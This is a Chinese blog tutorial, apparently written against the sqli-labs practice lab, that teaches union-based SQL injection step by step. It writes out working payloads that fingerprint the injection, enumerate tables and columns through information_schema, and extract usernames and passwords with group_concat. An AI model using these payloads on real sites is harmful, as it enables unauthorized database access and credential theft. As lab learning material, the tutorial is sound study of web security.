sql注入基础-----union联合查询

已于 2024-11-03 13:46:34 修改
阅读量1.3k 收藏 12
点赞数 8
文章标签: sql 数据库
于 2024-10-31 23:45:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_87451820/article/details/143353035
版权

sql注入:通过构造语句在注入点查询得到想要的信息------------(注入点:人机交互实行注入的地方,即输入命令的位置)

注入分类:1.按照查询字段:字符型注入、数字型注入

                  2.按照注入方法:union联合注入、报错注入、布尔注入、时间注入

目录

一:union联合注入

①查找注入点

②判断是字符型注入还是数字型注入

③若为字符型注入,判断闭合方式

④判断查询列数:用group by或order by的命令判断列数

⑤查询回显位置

⑥查询库名

⑦查询库名

⑧查询列名

⑨查询用户名及密码

一:union联合注入

步骤:①查找注入点

           ②判断是字符型注入还是数字型注入

           ③若为字符型注入,找到闭合方式,若为数字型注入,直接进行④

           ④判断查询列数

           ⑤查询回显位置

           ⑥查询库名

           ⑦查询表名

           ⑧查询列名

           ⑨查询用户名及密码

①查找注入点

1.观察参数位置:网页的url或是登陆页面的输入框都有可能是注入点

2.测试特殊字符:在疑似注入点的参数位置后输入’或;等特殊字符看是否引发报错,若报错信息与sql有关,则可能是注入点

3.使用扫描工具检测:SQLMap

②判断是字符型注入还是数字型注入

1.使用and 1=1都正常显示页面,使用and 1=2只有字符型注入仍能正常显示页面,而数字型注入不能正常显示页面---------------(and表示and前后都要同时满足才能正常显示指令)

e.g.下图所示是字符型注入的页面

a89f48367ce94ab9846d4234bf12f109.png

3bf692bddb4449e8a97867178c85828a.png

e.g.下图所示是数字型注入的页面

a626afa598c54b9ba65931568f6d8176.png

f3a4c9f322f04fda8973b7fbe6c811d9.png

2.使用简单运算判断(e.g.当输入?id=2-1后所显示的页面若与输入?id=2的页面一致,则为字符型注入;若与id=1的页面一致,则为数字型注入 )---------------(一般不用+,因为+会被当做空格)

e.g.下图所示是字符型注入的页面 

cfb691c25a5f48a390947bf98d2ddb11.png

940bd18640984c6ebf2f7fbe9c573605.png

371206da67ee4f9389bf5a9f2c94ce30.png

e.g.下图所示是数字型注入的页面 

31f50726f70c4b0a8cdf83c65d72ac34.png

aeeb935a8b3a4d62a0d6435aa8670940.png

c76fcb25e9e8463a9e7d2def32c7bbec.png

③若为字符型注入,判断闭合方式

闭合方式主要包括以下几种:单引号闭合“ ' “、双引号闭合” " ”、单引号括号闭合“ ')”、双引号括号闭合“ ")“

可以通过报错信息判断闭合方式

e.g.输入id=1',报错为1'',则除了输入的1'以外的'即为当前的闭合方式

ef1afdc83bc64168b6ed7947e18c3de8.png

e.g.输入id=1",报错为1""),则除了输入的1"以外的")即为当前的闭合方式 

609d6f16cc8a44d3b769579cb3f33af4.png

闭合的作用:手动结束前一段语句,从而在后面可加入其他语句以进行想要的查询,之后进行注释则可忽略后面本来的指令 

注释符号包括:--+、#(%23)

④判断查询列数:用group by或order by的命令判断列数

依顺序输入数字,当出现报错时,则出现报错数字的前一个数字即为列数

e.g.?id=1' group by 3 --+

bb2c44c8430a49a783bc188171bb3e08.png

此时页面正常显示

e.g.?id=1' group by 4 --+ 

02528b2900c34d008ad036af0613a2c8.png

此时页面报错,说明一共有三列 

e.g.?id=1' union select 1,2,3 --+

 此时正常显示页面

⑤查询回显位置

为了回显出想要查询的信息,让前半部分查询不到即可查询到我们想要的后半部分,则将id=-1或任意查询不到的数字即可只回显出我们想要查询的内容

e.g.?id=-1' union select 1,2,3 --+

19cf51351f7a4b61ac68501a76a01def.png

直接查看1,2,3哪个数字回显在页面上,哪个数字的位置就是回显位

⑥查询库名

在任一回显位输出命令

e.g.?id=-1' union select 1,2,database() --+

95aad63afc6e4d0b91b1eeaebb6c025f.png

即可得到库名为security 

⑦查询库名

information-schema是MySQL自带的数据库,其中有两个表我们需要使用到:tables(表名集合表)、columns(列名集合表)。tables中存在一个列名为table_ name

我们用到的查询语句是:select 列名 from 表名 where 限定语句

e.g.?id=-1’ union select 1,2,table_name from information_schema.tables where table_schema=database() --+

information_schema.tables代表information数据库中的tables这个特定的表

where table_schema=database()表示在目标数据库里查询,使查询到的值更精确

9931bab87aac4221aca1b549ffd879de.png

此时发现只显示一个数据email,因为默认只显示第一个数据,所以当我们想要查询到所有信息的时候,要用到一个函数group_concat()

group_concat():这个函数可以把分组中的多行数据连接成一个字符串从而显示到一起

e.g.?id=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

7fce313758bf4294b554d5e9afe71183.png

这样就可以一行显示多个数据了 

⑧查询列名

e.g.?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

and table_name='users'是为了更精确显示信息

74946003cf6742faa4a8869bf7314d56.png

 这时则显示出了列名

⑨查询用户名及密码

e.g.?id=-1' union select 1,2,group_concat(username,password) from users --+

47ce947d87b348189c4cd9e24ed26ed5.png

这时即查到了我们想要的信息 

0717-NS-B_W
关注
SQL注入——联合查询union
Cwillchris的博客
06-02 728
SQL注入联合查询超详细原理讲解
SQL注入漏洞-02】union注入联合查询)靶场实战
cc
02-01 6963
为了更清楚的看清sql语句的执行与变化过程,我们先修改源代码,打开Less-1/index.php,在源码中添加如下语句将执行的sql语句打印出来,方便我们查看。我们观察页面会发现,当我们输入id=1和id=2时,页面中的name和password的值是不一样的,说明我们输入的数据和数据库有交互并且将数据显示到页面上了。如果不知道表名也不影响,根据mysql数据库特性,select语句在执行的过程中,并不需要指定表名。,页面发生报错,说明后端未对前端发送的数据没有很好的过滤,产生了sql注入漏洞。
Union注入
m0_74312676的博客
07-20 757
但这只是一个列的名字,我们知道一个库中是有许许多多列的,于是我们进一步细化,table_schema表示的是数据库,database() 是一个函数,返回的是当前数据库的名字。利用phpMyAdmin查询数据库可以发现,id=1的内容有两列,但是我们回显的内容只有一列,于是便会回显id=1的第一列的内容。使用union select 查询,1,2,3表示的是三列的意思,也可以用其他数字来代替,只要是三个数字代表三列就行。分析报错信息:看\后面跟着的字符,是什么字符,它的闭合字符就是什么。
union联合查询注入
最新发布
weixin_73910929的博客
04-07 260
id=1’ --+ 回显正常,id=1‘ and 1=1 --+ 回显正常。id=1 and 1=1 返回正常,id=1 and 1=2 出现报错。使用union函数时,前面查询的元素要与后面查询的元素数量要一致。select 甲,乙,丙 union select 1,2,3。万能密码:id=1' or '1'='1,都为真。id=1’ and 1=2 --+ 没有回显。id=1 有回显, id=1’ 出现报错。4、查询数据库名、表名、列名、字段值。1、判断注入点和注入类型。
SQL注入union 联合注入
weixin_53711701的博客
01-16 5897
SQL注入union联合注入
SQL注入--联合查询注入
qq_37107430的博客
12-02 1704
联合查询注入Union Query Injection)是一种 SQL 注入攻击方式。SQL 注入是指攻击者通过在用户输入或其他数据输入点插入恶意的 SQL 语句,来改变数据库的预期行为。联合查询注入具体是利用 SQL 中的UNION关键字来合并两个或多个SELECT语句的查询结果。
sql注入 union联合查询注入(超详细)
jiji_king的博客
04-04 1万+
sql注入 union联合查询注入 我们以sqli-labs的第一关为例,来具体理解union联合查询注入的方法,理解每一步我为什么要这么去做。 好的,我们开始第一关! 首先查看sqli-labs第一关 这是第一关初始界面,在url界面输入?id=1 发现有回显,给我们回显了两个数据 当我们输入?id=1’ 时出现了语法错误,表示这里可能存在语法漏洞,我们进一步探索 当我们输入 ?id=1’ --+ 时,又回显正常,然后我们用 ?id=1’ and 1=1–+ 回显正常,?id=1’ and 1=2–
sql注入-union注入union函数 联合注入
07-11 7671
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
sql注入 联合查询
m0_70892020的博客
05-23 453
sql注入 联合查询
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL注入-03】union联合查询注入案例
m0_64378913的博客
04-25 4013
目录1 union联合查询注入概述1.1 简介1.2 适用条件1.3 注入步骤1.4 注入技巧2 union联合查询注入案例2.1 操作环境2.2 操作具体步骤2.2.1 判断是否存在注入点及注入的类型2.2.2 使用ORDER BY 查询回显列数。2.2.3 判断显示位置2.2.4 获取数据库名2.2.5 获取数据库中的所有表名2.2.6 获取数据库的对应表中的所有字段名2.2.7 获取字段中的数据3 总结 本博客内容仅供学习探讨,请勿滥用乱用 1 union联合查询注入概述 1.1 简介 union
WEB攻防-通用漏洞-SQL注入-MYSQL-union一般注入
weixin_45534587的博客
07-22 1068
id=-1' union select 1, 2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#id=1' and 1=1%23,(%23代表#),其中and 1=1为真,所以返回结果相同。id=1' and 1=2%23,由于and 1=2为假,根据条件判断sql执行后是null的,所以返回未查到数据。
SQL注入-联合查询注入union
qq_57307348的博客
01-23 3730
目录 SQL注入的一库三表 union联合查询注入注意事项 MySQL函数利用 1、常用函数 2、连接字符串函数 联合查询注入union 利用前提 联合注入的过程 1、先判断有没有注入点 3、判断有多少列 4、判断显示位 5、显示有哪些数据库 6、显示数据库中有哪些表 7、显示表中有哪些字段(以users为例) 8、获取字段 SQL注入的一库三表 information_schema 元数据数据库 (数据库名, 表名, 字段...
SQL注入联合查询注入
qq_45691294的博客
07-11 8914
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
sql注入union联合注入
m0_63436163的博客
01-30 1179
联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为--------的 或者不存在的值 就行了 显示就是以第二张表为主。
SQL使用(一)-----联合查询
热门推荐
u012999796的专栏
03-15 10万+
本文主要对内连接(inner Join 或 Join)、外连接(outer Join) 、左外连接(left outer Join 或 left Join)、右外连接(right outer Join 或 right Join)、全外连接(full outer Join 或 full Join)、交叉连接 (cross Join)、结果集链接 (unionunion all)等SQL联合查询进行了分析与介绍。
sql注入 union联合查询
hussu的博客
03-05 622
sql注入原理:参数用户可控:前端传给后端的参数内容时用户可以控制的 参数带入数据库查询:传入的参数拼接到sql语句,且带入数据库查询。 mysql 5.0版本之后,mysql默认在数据库中存放一个 information_schema 的数据库(information_schema.tables table_name column_name) mysql中常见注释方式有# 或--空格 或/**/(其中内联注释/*! union ....*/可以绕waf,原理:当!后面所接的数据库版本号时,当实际
web安全入门之SQL注入-联合查询
weixin_43726831的博客
09-11 861
SQL注入-联合查询法 之前已经介绍过
SQL注入Union注入
weixin_46013320的博客
03-18 633
主要解释SQL注入中关于Union的知识点。
SQL注入实战:sqli-labs实验详解
本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值